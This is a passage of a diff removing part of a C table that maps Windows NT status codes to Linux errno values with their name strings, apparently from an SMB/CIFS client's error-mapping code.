+-	{STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY, -EIO,
+-	"STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY"},
+-	{STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED, -EIO,
+-	"STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED"},
+-	{STATUS_INTERRUPT_STILL_CONNECTED, -EIO,
+-	"STATUS_INTERRUPT_STILL_CONNECTED"},
+-	{STATUS_PROCESS_CLONED, -EIO, "STATUS_PROCESS_CLONED"},
+-	{STATUS_FILE_LOCKED_WITH_ONLY_READERS, -EIO,
+-	"STATUS_FILE_LOCKED_WITH_ONLY_READERS"},
+-	{STATUS_FILE_LOCKED_WITH_WRITERS, -EIO,
+-	"STATUS_FILE_LOCKED_WITH_WRITERS"},
+-	{STATUS_RESOURCEMANAGER_READ_ONLY, -EROFS,
+-	"STATUS_RESOURCEMANAGER_READ_ONLY"},
+-	{STATUS_WAIT_FOR_OPLOCK, -EIO, "STATUS_WAIT_FOR_OPLOCK"},
+-	{DBG_EXCEPTION_HANDLED, -EIO, "DBG_EXCEPTION_HANDLED"},
+-	{DBG_CONTINUE, -EIO, "DBG_CONTINUE"},
+-	{STATUS_FLT_IO_COMPLETE, -EIO, "STATUS_FLT_IO_COMPLETE"},
+-	{STATUS_OBJECT_NAME_EXISTS, -EIO, "STATUS_OBJECT_NAME_EXISTS"},
+-	{STATUS_THREAD_WAS_SUSPENDED, -EIO, "STATUS_THREAD_WAS_SUSPENDED"},
+-	{STATUS_WORKING_SET_LIMIT_RANGE, -EIO,
+-	"STATUS_WORKING_SET_LIMIT_RANGE"},
+-	{STATUS_IMAGE_NOT_AT_BASE, -EIO, "STATUS_IMAGE_NOT_AT_BASE"},
+-	{STATUS_RXACT_STATE_CREATED, -EIO, "STATUS_RXACT_STATE_CREATED"},
+-	{STATUS_SEGMENT_NOTIFICATION, -EIO, "STATUS_SEGMENT_NOTIFICATION"},
+-	{STATUS_LOCAL_USER_SESSION_KEY, -EIO, "STATUS_LOCAL_USER_SESSION_KEY"},
+-	{STATUS_BAD_CURRENT_DIRECTORY, -EIO, "STATUS_BAD_CURRENT_DIRECTORY"},
+-	{STATUS_SERIAL_MORE_WRITES, -EIO, "STATUS_SERIAL_MORE_WRITES"},
+-	{STATUS_REGISTRY_RECOVERED, -EIO, "STATUS_REGISTRY_RECOVERED"},
+-	{STATUS_FT_READ_RECOVERY_FROM_BACKUP, -EIO,
+-	"STATUS_FT_READ_RECOVERY_FROM_BACKUP"},
+-	{STATUS_FT_WRITE_RECOVERY, -EIO, "STATUS_FT_WRITE_RECOVERY"},
+-	{STATUS_SERIAL_COUNTER_TIMEOUT, -ETIMEDOUT,
+-	"STATUS_SERIAL_COUNTER_TIMEOUT"},
+-	{STATUS_NULL_LM_PASSWORD, -EIO, "STATUS_NULL_LM_PASSWORD"},
+-	{STATUS_IMAGE_MACHINE_TYPE_MISMATCH, -EIO,
+-	"STATUS_IMAGE_MACHINE_TYPE_MISMATCH"},
+-	{STATUS_RECEIVE_PARTIAL, -EIO, "STATUS_RECEIVE_PARTIAL"},
+-	{STATUS_RECEIVE_EXPEDITED, -EIO, "STATUS_RECEIVE_EXPEDITED"},
+-	{STATUS_RECEIVE_PARTIAL_EXPEDITED, -EIO,
+-	"STATUS_RECEIVE_PARTIAL_EXPEDITED"},
+-	{STATUS_EVENT_DONE, -EIO, "STATUS_EVENT_DONE"},
+-	{STATUS_EVENT_PENDING, -EIO, "STATUS_EVENT_PENDING"},
+-	{STATUS_CHECKING_FILE_SYSTEM, -EIO, "STATUS_CHECKING_FILE_SYSTEM"},
+-	{STATUS_FATAL_APP_EXIT, -EIO, "STATUS_FATAL_APP_EXIT"},
+-	{STATUS_PREDEFINED_HANDLE, -EIO, "STATUS_PREDEFINED_HANDLE"},
+-	{STATUS_WAS_UNLOCKED, -EIO, "STATUS_WAS_UNLOCKED"},
+-	{STATUS_SERVICE_NOTIFICATION, -EIO, "STATUS_SERVICE_NOTIFICATION"},
+-	{STATUS_WAS_LOCKED, -EIO, "STATUS_WAS_LOCKED"},
+-	{STATUS_LOG_HARD_ERROR, -EIO, "STATUS_LOG_HARD_ERROR"},
+-	{STATUS_ALREADY_WIN32, -EIO, "STATUS_ALREADY_WIN32"},
+-	{STATUS_WX86_UNSIMULATE, -EIO, "STATUS_WX86_UNSIMULATE"},
+-	{STATUS_WX86_CONTINUE, -EIO, "STATUS_WX86_CONTINUE"},
+-	{STATUS_WX86_SINGLE_STEP, -EIO, "STATUS_WX86_SINGLE_STEP"},
+-	{STATUS_WX86_BREAKPOINT, -EIO, "STATUS_WX86_BREAKPOINT"},
+-	{STATUS_WX86_EXCEPTION_CONTINUE, -EIO,
+-	"STATUS_WX86_EXCEPTION_CONTINUE"},
+-	{STATUS_WX86_EXCEPTION_LASTCHANCE, -EIO,
+-	"STATUS_WX86_EXCEPTION_LASTCHANCE"},
+-	{STATUS_WX86_EXCEPTION_CHAIN, -EIO, "STATUS_WX86_EXCEPTION_CHAIN"},
+-	{STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE, -EIO,
+-	"STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE"},
+-	{STATUS_NO_YIELD_PERFORMED, -EIO, "STATUS_NO_YIELD_PERFORMED"},
+-	{STATUS_TIMER_RESUME_IGNORED, -EIO, "STATUS_TIMER_RESUME_IGNORED"},
+-	{STATUS_ARBITRATION_UNHANDLED, -EIO, "STATUS_ARBITRATION_UNHANDLED"},
+-	{STATUS_CARDBUS_NOT_SUPPORTED, -ENOSYS, "STATUS_CARDBUS_NOT_SUPPORTED"},
+-	{STATUS_WX86_CREATEWX86TIB, -EIO, "STATUS_WX86_CREATEWX86TIB"},
+-	{STATUS_MP_PROCESSOR_MISMATCH, -EIO, "STATUS_MP_PROCESSOR_MISMATCH"},
+-	{STATUS_HIBERNATED, -EIO, "STATUS_HIBERNATED"},
+-	{STATUS_RESUME_HIBERNATION, -EIO, "STATUS_RESUME_HIBERNATION"},
+-	{STATUS_FIRMWARE_UPDATED, -EIO, "STATUS_FIRMWARE_UPDATED"},
+-	{STATUS_DRIVERS_LEAKING_LOCKED_PAGES, -EIO,
+-	"STATUS_DRIVERS_LEAKING_LOCKED_PAGES"},
+-	{STATUS_MESSAGE_RETRIEVED, -EIO, "STATUS_MESSAGE_RETRIEVED"},
+-	{STATUS_SYSTEM_POWERSTATE_TRANSITION, -EIO,
+-	"STATUS_SYSTEM_POWERSTATE_TRANSITION"},
+-	{STATUS_ALPC_CHECK_COMPLETION_LIST, -EIO,
+-	"STATUS_ALPC_CHECK_COMPLETION_LIST"},
+-	{STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION, -EIO,
+-	"STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION"},
+-	{STATUS_ACCESS_AUDIT_BY_POLICY, -EIO, "STATUS_ACCESS_AUDIT_BY_POLICY"},
+-	{STATUS_ABANDON_HIBERFILE, -EIO, "STATUS_ABANDON_HIBERFILE"},
+-	{STATUS_BIZRULES_NOT_ENABLED, -EIO, "STATUS_BIZRULES_NOT_ENABLED"},
+-	{STATUS_WAKE_SYSTEM, -EIO, "STATUS_WAKE_SYSTEM"},
+-	{STATUS_DS_SHUTTING_DOWN, -EIO, "STATUS_DS_SHUTTING_DOWN"},
+-	{DBG_REPLY_LATER, -EIO, "DBG_REPLY_LATER"},
+-	{DBG_UNABLE_TO_PROVIDE_HANDLE, -EIO, "DBG_UNABLE_TO_PROVIDE_HANDLE"},
+-	{DBG_TERMINATE_THREAD, -EIO, "DBG_TERMINATE_THREAD"},
+-	{DBG_TERMINATE_PROCESS, -EIO, "DBG_TERMINATE_PROCESS"},
+-	{DBG_CONTROL_C, -EIO, "DBG_CONTROL_C"},
+-	{DBG_PRINTEXCEPTION_C, -EIO, "DBG_PRINTEXCEPTION_C"},
+-	{DBG_RIPEXCEPTION, -EIO, "DBG_RIPEXCEPTION"},
+-	{DBG_CONTROL_BREAK, -EIO, "DBG_CONTROL_BREAK"},
+-	{DBG_COMMAND_EXCEPTION, -EIO, "DBG_COMMAND_EXCEPTION"},
+-	{RPC_NT_UUID_LOCAL_ONLY, -EIO, "RPC_NT_UUID_LOCAL_ONLY"},
+-	{RPC_NT_SEND_INCOMPLETE, -EIO, "RPC_NT_SEND_INCOMPLETE"},
+-	{STATUS_CTX_CDM_CONNECT, -EIO, "STATUS_CTX_CDM_CONNECT"},
+-	{STATUS_CTX_CDM_DISCONNECT, -EIO, "STATUS_CTX_CDM_DISCONNECT"},
+-	{STATUS_SXS_RELEASE_ACTIVATION_CONTEXT, -EIO,
+-	"STATUS_SXS_RELEASE_ACTIVATION_CONTEXT"},
+-	{STATUS_RECOVERY_NOT_NEEDED, -EIO, "STATUS_RECOVERY_NOT_NEEDED"},
+-	{STATUS_RM_ALREADY_STARTED, -EIO, "STATUS_RM_ALREADY_STARTED"},
+-	{STATUS_LOG_NO_RESTART, -EIO, "STATUS_LOG_NO_RESTART"},
+-	{STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST, -EIO,
+-	"STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST"},
+-	{STATUS_GRAPHICS_PARTIAL_DATA_POPULATED, -EIO,
+-	"STATUS_GRAPHICS_PARTIAL_DATA_POPULATED"},
+-	{STATUS_GRAPHICS_DRIVER_MISMATCH, -EIO,
+-	"STATUS_GRAPHICS_DRIVER_MISMATCH"},
+-	{STATUS_GRAPHICS_MODE_NOT_PINNED, -EIO,
+-	"STATUS_GRAPHICS_MODE_NOT_PINNED"},
+-	{STATUS_GRAPHICS_NO_PREFERRED_MODE, -EIO,
+-	"STATUS_GRAPHICS_NO_PREFERRED_MODE"},
+-	{STATUS_GRAPHICS_DATASET_IS_EMPTY, -EIO,
+-	"STATUS_GRAPHICS_DATASET_IS_EMPTY"},
+-	{STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET, -EIO,
+-	"STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET"},
+-	{STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED, -EIO,
+-	"STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED"},
+-	{STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS, -EIO,
+-	"STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS"},
+-	{STATUS_GRAPHICS_LEADLINK_START_DEFERRED, -EIO,
+-	"STATUS_GRAPHICS_LEADLINK_START_DEFERRED"},
+-	{STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY, -EIO,
+-	"STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY"},
+-	{STATUS_GRAPHICS_START_DEFERRED, -EIO,
+-	"STATUS_GRAPHICS_START_DEFERRED"},
+-	{STATUS_NDIS_INDICATION_REQUIRED, -EIO,
+-	"STATUS_NDIS_INDICATION_REQUIRED"},
+-	{STATUS_GUARD_PAGE_VIOLATION, -EIO, "STATUS_GUARD_PAGE_VIOLATION"},
+-	{STATUS_DATATYPE_MISALIGNMENT, -EIO, "STATUS_DATATYPE_MISALIGNMENT"},
+-	{STATUS_BREAKPOINT, -EIO, "STATUS_BREAKPOINT"},
+-	{STATUS_SINGLE_STEP, -EIO, "STATUS_SINGLE_STEP"},
+-	{STATUS_BUFFER_OVERFLOW, -E2BIG, "STATUS_BUFFER_OVERFLOW"},
+-	{STATUS_NO_MORE_FILES, -ENODATA, "STATUS_NO_MORE_FILES"},
+-	{STATUS_WAKE_SYSTEM_DEBUGGER, -EIO, "STATUS_WAKE_SYSTEM_DEBUGGER"},
+-	{STATUS_HANDLES_CLOSED, -EIO, "STATUS_HANDLES_CLOSED"},
+-	{STATUS_NO_INHERITANCE, -EIO, "STATUS_NO_INHERITANCE"},
+-	{STATUS_GUID_SUBSTITUTION_MADE, -EIO, "STATUS_GUID_SUBSTITUTION_MADE"},
+-	{STATUS_PARTIAL_COPY, -EIO, "STATUS_PARTIAL_COPY"},
+-	{STATUS_DEVICE_PAPER_EMPTY, -EIO, "STATUS_DEVICE_PAPER_EMPTY"},
+-	{STATUS_DEVICE_POWERED_OFF, -EIO, "STATUS_DEVICE_POWERED_OFF"},
+-	{STATUS_DEVICE_OFF_LINE, -EIO, "STATUS_DEVICE_OFF_LINE"},
+-	{STATUS_DEVICE_BUSY, -EBUSY, "STATUS_DEVICE_BUSY"},
+-	{STATUS_NO_MORE_EAS, -EIO, "STATUS_NO_MORE_EAS"},
+-	{STATUS_INVALID_EA_NAME, -EINVAL, "STATUS_INVALID_EA_NAME"},
+-	{STATUS_EA_LIST_INCONSISTENT, -EIO, "STATUS_EA_LIST_INCONSISTENT"},
+-	{STATUS_INVALID_EA_FLAG, -EINVAL, "STATUS_INVALID_EA_FLAG"},
+-	{STATUS_VERIFY_REQUIRED, -EIO, "STATUS_VERIFY_REQUIRED"},
+-	{STATUS_EXTRANEOUS_INFORMATION, -EIO, "STATUS_EXTRANEOUS_INFORMATION"},
+-	{STATUS_RXACT_COMMIT_NECESSARY, -EIO, "STATUS_RXACT_COMMIT_NECESSARY"},
+-	{STATUS_NO_MORE_ENTRIES, -EIO, "STATUS_NO_MORE_ENTRIES"},
+-	{STATUS_FILEMARK_DETECTED, -EIO, "STATUS_FILEMARK_DETECTED"},
+-	{STATUS_MEDIA_CHANGED, -EIO, "STATUS_MEDIA_CHANGED"},
+-	{STATUS_BUS_RESET, -EIO, "STATUS_BUS_RESET"},
+-	{STATUS_END_OF_MEDIA, -EIO, "STATUS_END_OF_MEDIA"},
+-	{STATUS_BEGINNING_OF_MEDIA, -EIO, "STATUS_BEGINNING_OF_MEDIA"},
+-	{STATUS_MEDIA_CHECK, -EIO, "STATUS_MEDIA_CHECK"},
+-	{STATUS_SETMARK_DETECTED, -EIO, "STATUS_SETMARK_DETECTED"},
+-	{STATUS_NO_DATA_DETECTED, -EIO, "STATUS_NO_DATA_DETECTED"},
+-	{STATUS_REDIRECTOR_HAS_OPEN_HANDLES, -EIO,
+-	"STATUS_REDIRECTOR_HAS_OPEN_HANDLES"},
+-	{STATUS_SERVER_HAS_OPEN_HANDLES, -EIO,
+-	"STATUS_SERVER_HAS_OPEN_HANDLES"},
+-	{STATUS_ALREADY_DISCONNECTED, -EIO, "STATUS_ALREADY_DISCONNECTED"},
+-	{STATUS_LONGJUMP, -EIO, "STATUS_LONGJUMP"},
+-	{STATUS_CLEANER_CARTRIDGE_INSTALLED, -EIO,
+-	"STATUS_CLEANER_CARTRIDGE_INSTALLED"},
+-	{STATUS_PLUGPLAY_QUERY_VETOED, -EIO, "STATUS_PLUGPLAY_QUERY_VETOED"},
+-	{STATUS_UNWIND_CONSOLIDATE, -EIO, "STATUS_UNWIND_CONSOLIDATE"},
+-	{STATUS_REGISTRY_HIVE_RECOVERED, -EIO,
+-	"STATUS_REGISTRY_HIVE_RECOVERED"},
+-	{STATUS_DLL_MIGHT_BE_INSECURE, -EIO, "STATUS_DLL_MIGHT_BE_INSECURE"},
+-	{STATUS_DLL_MIGHT_BE_INCOMPATIBLE, -EIO,
+-	"STATUS_DLL_MIGHT_BE_INCOMPATIBLE"},
+-	{STATUS_STOPPED_ON_SYMLINK, -EOPNOTSUPP, "STATUS_STOPPED_ON_SYMLINK"},
+-	{STATUS_IO_REPARSE_TAG_NOT_HANDLED, -EOPNOTSUPP,
+-	"STATUS_REPARSE_NOT_HANDLED"},
+-	{STATUS_DEVICE_REQUIRES_CLEANING, -EIO,
+-	"STATUS_DEVICE_REQUIRES_CLEANING"},
+-	{STATUS_DEVICE_DOOR_OPEN, -EIO, "STATUS_DEVICE_DOOR_OPEN"},
+-	{STATUS_DATA_LOST_REPAIR, -EIO, "STATUS_DATA_LOST_REPAIR"},
+-	{DBG_EXCEPTION_NOT_HANDLED, -EIO, "DBG_EXCEPTION_NOT_HANDLED"},
+-	{STATUS_CLUSTER_NODE_ALREADY_UP, -EIO,
+-	"STATUS_CLUSTER_NODE_ALREADY_UP"},
+-	{STATUS_CLUSTER_NODE_ALREADY_DOWN, -EIO,
+-	"STATUS_CLUSTER_NODE_ALREADY_DOWN"},
+-	{STATUS_CLUSTER_NETWORK_ALREADY_ONLINE, -EIO,
+-	"STATUS_CLUSTER_NETWORK_ALREADY_ONLINE"},
+-	{STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE, -EIO,
+-	"STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE"},
+-	{STATUS_CLUSTER_NODE_ALREADY_MEMBER, -EIO,
+-	"STATUS_CLUSTER_NODE_ALREADY_MEMBER"},
+-	{STATUS_COULD_NOT_RESIZE_LOG, -EIO, "STATUS_COULD_NOT_RESIZE_LOG"},
+-	{STATUS_NO_TXF_METADATA, -EIO, "STATUS_NO_TXF_METADATA"},
+-	{STATUS_CANT_RECOVER_WITH_HANDLE_OPEN, -EIO,
+-	"STATUS_CANT_RECOVER_WITH_HANDLE_OPEN"},
+-	{STATUS_TXF_METADATA_ALREADY_PRESENT, -EIO,
+-	"STATUS_TXF_METADATA_ALREADY_PRESENT"},
+-	{STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET, -EIO,
+-	"STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET"},
+-	{STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED, -EIO,
+-	"STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED"},
+-	{STATUS_FLT_BUFFER_TOO_SMALL, -ENOBUFS, "STATUS_FLT_BUFFER_TOO_SMALL"},
+-	{STATUS_FVE_PARTIAL_METADATA, -EIO, "STATUS_FVE_PARTIAL_METADATA"},
+-	{STATUS_UNSUCCESSFUL, -EIO, "STATUS_UNSUCCESSFUL"},
+-	{STATUS_NOT_IMPLEMENTED, -EOPNOTSUPP, "STATUS_NOT_IMPLEMENTED"},
+-	{STATUS_INVALID_INFO_CLASS, -EIO, "STATUS_INVALID_INFO_CLASS"},
+-	{STATUS_INFO_LENGTH_MISMATCH, -EIO, "STATUS_INFO_LENGTH_MISMATCH"},
+-	{STATUS_ACCESS_VIOLATION, -EACCES, "STATUS_ACCESS_VIOLATION"},
+-	{STATUS_IN_PAGE_ERROR, -EFAULT, "STATUS_IN_PAGE_ERROR"},
+-	{STATUS_PAGEFILE_QUOTA, -EDQUOT, "STATUS_PAGEFILE_QUOTA"},
+-	{STATUS_INVALID_HANDLE, -EBADF, "STATUS_INVALID_HANDLE"},
+-	{STATUS_BAD_INITIAL_STACK, -EIO, "STATUS_BAD_INITIAL_STACK"},
+-	{STATUS_BAD_INITIAL_PC, -EIO, "STATUS_BAD_INITIAL_PC"},
+-	{STATUS_INVALID_CID, -EIO, "STATUS_INVALID_CID"},
+-	{STATUS_TIMER_NOT_CANCELED, -EIO, "STATUS_TIMER_NOT_CANCELED"},
+-	{STATUS_INVALID_PARAMETER, -EINVAL, "STATUS_INVALID_PARAMETER"},
+-	{STATUS_NO_SUCH_DEVICE, -ENODEV, "STATUS_NO_SUCH_DEVICE"},
+-	{STATUS_NO_SUCH_FILE, -ENOENT, "STATUS_NO_SUCH_FILE"},
+-	{STATUS_INVALID_DEVICE_REQUEST, -EOPNOTSUPP, "STATUS_INVALID_DEVICE_REQUEST"},
+-	{STATUS_END_OF_FILE, -ENODATA, "STATUS_END_OF_FILE"},
+-	{STATUS_WRONG_VOLUME, -EIO, "STATUS_WRONG_VOLUME"},
+-	{STATUS_NO_MEDIA_IN_DEVICE, -EIO, "STATUS_NO_MEDIA_IN_DEVICE"},
+-	{STATUS_UNRECOGNIZED_MEDIA, -EIO, "STATUS_UNRECOGNIZED_MEDIA"},
+-	{STATUS_NONEXISTENT_SECTOR, -EIO, "STATUS_NONEXISTENT_SECTOR"},
+-	{STATUS_MORE_PROCESSING_REQUIRED, -EIO,
+-	"STATUS_MORE_PROCESSING_REQUIRED"},
+-	{STATUS_NO_MEMORY, -EREMOTEIO, "STATUS_NO_MEMORY"},
+-	{STATUS_CONFLICTING_ADDRESSES, -EADDRINUSE,
+-	"STATUS_CONFLICTING_ADDRESSES"},
+-	{STATUS_NOT_MAPPED_VIEW, -EIO, "STATUS_NOT_MAPPED_VIEW"},
+-	{STATUS_UNABLE_TO_FREE_VM, -EIO, "STATUS_UNABLE_TO_FREE_VM"},
+-	{STATUS_UNABLE_TO_DELETE_SECTION, -EIO,
+-	"STATUS_UNABLE_TO_DELETE_SECTION"},
+-	{STATUS_INVALID_SYSTEM_SERVICE, -EIO, "STATUS_INVALID_SYSTEM_SERVICE"},
+-	{STATUS_ILLEGAL_INSTRUCTION, -EIO, "STATUS_ILLEGAL_INSTRUCTION"},
+-	{STATUS_INVALID_LOCK_SEQUENCE, -EIO, "STATUS_INVALID_LOCK_SEQUENCE"},
+-	{STATUS_INVALID_VIEW_SIZE, -EIO, "STATUS_INVALID_VIEW_SIZE"},
+-	{STATUS_INVALID_FILE_FOR_SECTION, -EIO,
+-	"STATUS_INVALID_FILE_FOR_SECTION"},
+-	{STATUS_ALREADY_COMMITTED, -EIO, "STATUS_ALREADY_COMMITTED"},
+-	{STATUS_ACCESS_DENIED, -EACCES, "STATUS_ACCESS_DENIED"},
+-	{STATUS_BUFFER_TOO_SMALL, -EIO, "STATUS_BUFFER_TOO_SMALL"},
+-	{STATUS_OBJECT_TYPE_MISMATCH, -EIO, "STATUS_OBJECT_TYPE_MISMATCH"},
+-	{STATUS_NONCONTINUABLE_EXCEPTION, -EIO,
+-	"STATUS_NONCONTINUABLE_EXCEPTION"},
+-	{STATUS_INVALID_DISPOSITION, -EIO, "STATUS_INVALID_DISPOSITION"},
+-	{STATUS_UNWIND, -EIO, "STATUS_UNWIND"},
+-	{STATUS_BAD_STACK, -EIO, "STATUS_BAD_STACK"},
+-	{STATUS_INVALID_UNWIND_TARGET, -EIO, "STATUS_INVALID_UNWIND_TARGET"},
+-	{STATUS_NOT_LOCKED, -EIO, "STATUS_NOT_LOCKED"},
+-	{STATUS_PARITY_ERROR, -EIO, "STATUS_PARITY_ERROR"},
+-	{STATUS_UNABLE_TO_DECOMMIT_VM, -EIO, "STATUS_UNABLE_TO_DECOMMIT_VM"},
+-	{STATUS_NOT_COMMITTED, -EIO, "STATUS_NOT_COMMITTED"},
+-	{STATUS_INVALID_PORT_ATTRIBUTES, -EIO,
+-	"STATUS_INVALID_PORT_ATTRIBUTES"},
+-	{STATUS_PORT_MESSAGE_TOO_LONG, -EIO, "STATUS_PORT_MESSAGE_TOO_LONG"},
+-	{STATUS_INVALID_PARAMETER_MIX, -EINVAL, "STATUS_INVALID_PARAMETER_MIX"},
+-	{STATUS_INVALID_QUOTA_LOWER, -EIO, "STATUS_INVALID_QUOTA_LOWER"},
+-	{STATUS_DISK_CORRUPT_ERROR, -EIO, "STATUS_DISK_CORRUPT_ERROR"},
+-	{STATUS_OBJECT_NAME_INVALID, -ENOENT, "STATUS_OBJECT_NAME_INVALID"},
+-	{STATUS_OBJECT_NAME_NOT_FOUND, -ENOENT, "STATUS_OBJECT_NAME_NOT_FOUND"},
+-	{STATUS_OBJECT_NAME_COLLISION, -EEXIST, "STATUS_OBJECT_NAME_COLLISION"},
+-	{STATUS_PORT_DISCONNECTED, -EIO, "STATUS_PORT_DISCONNECTED"},
+-	{STATUS_DEVICE_ALREADY_ATTACHED, -EIO,
+-	"STATUS_DEVICE_ALREADY_ATTACHED"},
+-	{STATUS_OBJECT_PATH_INVALID, -ENOTDIR, "STATUS_OBJECT_PATH_INVALID"},
+-	{STATUS_OBJECT_PATH_NOT_FOUND, -ENOENT, "STATUS_OBJECT_PATH_NOT_FOUND"},
+-	{STATUS_OBJECT_PATH_SYNTAX_BAD, -EIO, "STATUS_OBJECT_PATH_SYNTAX_BAD"},
+-	{STATUS_DATA_OVERRUN, -EIO, "STATUS_DATA_OVERRUN"},
+-	{STATUS_DATA_LATE_ERROR, -EIO, "STATUS_DATA_LATE_ERROR"},
+-	{STATUS_DATA_ERROR, -EIO, "STATUS_DATA_ERROR"},
+-	{STATUS_CRC_ERROR, -EIO, "STATUS_CRC_ERROR"},
+-	{STATUS_SECTION_TOO_BIG, -EIO, "STATUS_SECTION_TOO_BIG"},
+-	{STATUS_PORT_CONNECTION_REFUSED, -ECONNREFUSED,
+-	"STATUS_PORT_CONNECTION_REFUSED"},
+-	{STATUS_INVALID_PORT_HANDLE, -EIO, "STATUS_INVALID_PORT_HANDLE"},
+-	{STATUS_SHARING_VIOLATION, -EBUSY, "STATUS_SHARING_VIOLATION"},
+-	{STATUS_QUOTA_EXCEEDED, -EDQUOT, "STATUS_QUOTA_EXCEEDED"},
+-	{STATUS_INVALID_PAGE_PROTECTION, -EIO,
+-	"STATUS_INVALID_PAGE_PROTECTION"},
+-	{STATUS_MUTANT_NOT_OWNED, -EIO, "STATUS_MUTANT_NOT_OWNED"},
+-	{STATUS_SEMAPHORE_LIMIT_EXCEEDED, -EIO,
+-	"STATUS_SEMAPHORE_LIMIT_EXCEEDED"},
+-	{STATUS_PORT_ALREADY_SET, -EIO, "STATUS_PORT_ALREADY_SET"},
+-	{STATUS_SECTION_NOT_IMAGE, -EIO, "STATUS_SECTION_NOT_IMAGE"},
+-	{STATUS_SUSPEND_COUNT_EXCEEDED, -EIO, "STATUS_SUSPEND_COUNT_EXCEEDED"},
+-	{STATUS_THREAD_IS_TERMINATING, -EIO, "STATUS_THREAD_IS_TERMINATING"},
+-	{STATUS_BAD_WORKING_SET_LIMIT, -EIO, "STATUS_BAD_WORKING_SET_LIMIT"},
+-	{STATUS_INCOMPATIBLE_FILE_MAP, -EIO, "STATUS_INCOMPATIBLE_FILE_MAP"},
+-	{STATUS_SECTION_PROTECTION, -EIO, "STATUS_SECTION_PROTECTION"},
+-	{STATUS_EAS_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_EAS_NOT_SUPPORTED"},
+-	{STATUS_EA_TOO_LARGE, -EIO, "STATUS_EA_TOO_LARGE"},
+-	{STATUS_NONEXISTENT_EA_ENTRY, -EIO, "STATUS_NONEXISTENT_EA_ENTRY"},
+-	{STATUS_NO_EAS_ON_FILE, -ENODATA, "STATUS_NO_EAS_ON_FILE"},
+-	{STATUS_EA_CORRUPT_ERROR, -EIO, "STATUS_EA_CORRUPT_ERROR"},
+-	{STATUS_FILE_LOCK_CONFLICT, -EACCES, "STATUS_FILE_LOCK_CONFLICT"},
+-	{STATUS_LOCK_NOT_GRANTED, -EACCES, "STATUS_LOCK_NOT_GRANTED"},
+-	{STATUS_DELETE_PENDING, -ENOENT, "STATUS_DELETE_PENDING"},
+-	{STATUS_CTL_FILE_NOT_SUPPORTED, -ENOSYS,
+-	"STATUS_CTL_FILE_NOT_SUPPORTED"},
+-	{STATUS_UNKNOWN_REVISION, -EIO, "STATUS_UNKNOWN_REVISION"},
+-	{STATUS_REVISION_MISMATCH, -EIO, "STATUS_REVISION_MISMATCH"},
+-	{STATUS_INVALID_OWNER, -EIO, "STATUS_INVALID_OWNER"},
+-	{STATUS_INVALID_PRIMARY_GROUP, -EIO, "STATUS_INVALID_PRIMARY_GROUP"},
+-	{STATUS_NO_IMPERSONATION_TOKEN, -EIO, "STATUS_NO_IMPERSONATION_TOKEN"},
+-	{STATUS_CANT_DISABLE_MANDATORY, -EIO, "STATUS_CANT_DISABLE_MANDATORY"},
+-	{STATUS_NO_LOGON_SERVERS, -EIO, "STATUS_NO_LOGON_SERVERS"},
+-	{STATUS_NO_SUCH_LOGON_SESSION, -EIO, "STATUS_NO_SUCH_LOGON_SESSION"},
+-	{STATUS_NO_SUCH_PRIVILEGE, -EIO, "STATUS_NO_SUCH_PRIVILEGE"},
+-	{STATUS_PRIVILEGE_NOT_HELD, -EIO, "STATUS_PRIVILEGE_NOT_HELD"},
+-	{STATUS_INVALID_ACCOUNT_NAME, -EIO, "STATUS_INVALID_ACCOUNT_NAME"},
+-	{STATUS_USER_EXISTS, -EIO, "STATUS_USER_EXISTS"},
+-	{STATUS_NO_SUCH_USER, -EIO, "STATUS_NO_SUCH_USER"},
+-	{STATUS_GROUP_EXISTS, -EIO, "STATUS_GROUP_EXISTS"},
+-	{STATUS_NO_SUCH_GROUP, -EIO, "STATUS_NO_SUCH_GROUP"},
+-	{STATUS_MEMBER_IN_GROUP, -EIO, "STATUS_MEMBER_IN_GROUP"},
+-	{STATUS_MEMBER_NOT_IN_GROUP, -EIO, "STATUS_MEMBER_NOT_IN_GROUP"},
+-	{STATUS_LAST_ADMIN, -EIO, "STATUS_LAST_ADMIN"},
+-	{STATUS_WRONG_PASSWORD, -EACCES, "STATUS_WRONG_PASSWORD"},
+-	{STATUS_ILL_FORMED_PASSWORD, -EINVAL, "STATUS_ILL_FORMED_PASSWORD"},
+-	{STATUS_PASSWORD_RESTRICTION, -EACCES, "STATUS_PASSWORD_RESTRICTION"},
+-	{STATUS_LOGON_FAILURE, -EACCES, "STATUS_LOGON_FAILURE"},
+-	{STATUS_ACCOUNT_RESTRICTION, -EACCES, "STATUS_ACCOUNT_RESTRICTION"},
+-	{STATUS_INVALID_LOGON_HOURS, -EACCES, "STATUS_INVALID_LOGON_HOURS"},
+-	{STATUS_INVALID_WORKSTATION, -EACCES, "STATUS_INVALID_WORKSTATION"},
+-	{STATUS_PASSWORD_EXPIRED, -EKEYEXPIRED, "STATUS_PASSWORD_EXPIRED"},
+-	{STATUS_ACCOUNT_DISABLED, -EKEYREVOKED, "STATUS_ACCOUNT_DISABLED"},
+-	{STATUS_NONE_MAPPED, -EIO, "STATUS_NONE_MAPPED"},
+-	{STATUS_TOO_MANY_LUIDS_REQUESTED, -EIO,
